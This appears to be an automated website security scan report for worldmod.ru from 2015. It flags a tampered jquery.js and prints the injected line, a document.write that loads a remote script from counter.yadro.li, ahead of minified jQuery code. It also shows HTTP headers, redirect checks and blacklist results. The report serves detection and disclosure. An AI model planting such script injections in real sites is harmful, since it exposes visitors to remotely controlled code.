Scanned pages/files
Request | Server response | Status |
http://worldmod.ru/ | 200 OK Content-Length: 37310 Content-Type: text/html | clean |
http://worldmod.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 93827 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<script type="text/javascript" src="//counter.yadro.li/worldmod"></script>'); (function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var Antivirus reports:
| ||
http://worldmod.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 75927 Content-Type: application/x-javascript | clean |
http://worldmod.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 23054 Content-Type: application/x-javascript | clean |
http://worldmod.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 47121 Content-Type: application/x-javascript | clean |
http://worldmod.ru/like/share42.js | 200 OK Content-Length: 3863 Content-Type: application/x-javascript | clean |
http://worldmod.ru//pagead2.googlesyndication.com/pagead/show_ads.js/ | 404 Not Found Content-Length: 324 Content-Type: text/html | clean |
http://worldmod.ru/test404page.js | 404 Not Found Content-Length: 289 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: worldmod.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 29 Jan 2015 14:21:25 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=g4umasm9hvttc0hn8j1p1fklk3; path=/; domain=.worldmod.ru; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
X-Powered-By: PHP/5.4.4-14+deb7u5
GET / HTTP/1.1
Host: worldmod.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 29 Jan 2015 14:21:25 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=g4umasm9hvttc0hn8j1p1fklk3; path=/; domain=.worldmod.ru; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.worldmod.ru; httponly
X-Powered-By: PHP/5.4.4-14+deb7u5
Second query (visit from search engine):
GET / HTTP/1.1
Host: worldmod.ru
Referer: http://www.google.com/search?q=worldmod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: worldmod.ru
Referer: http://www.google.com/search?q=worldmod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=worldmod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://worldmod.ru/
Result: worldmod.ru is not infected or malware details are not published yet.
Result: worldmod.ru is not infected or malware details are not published yet.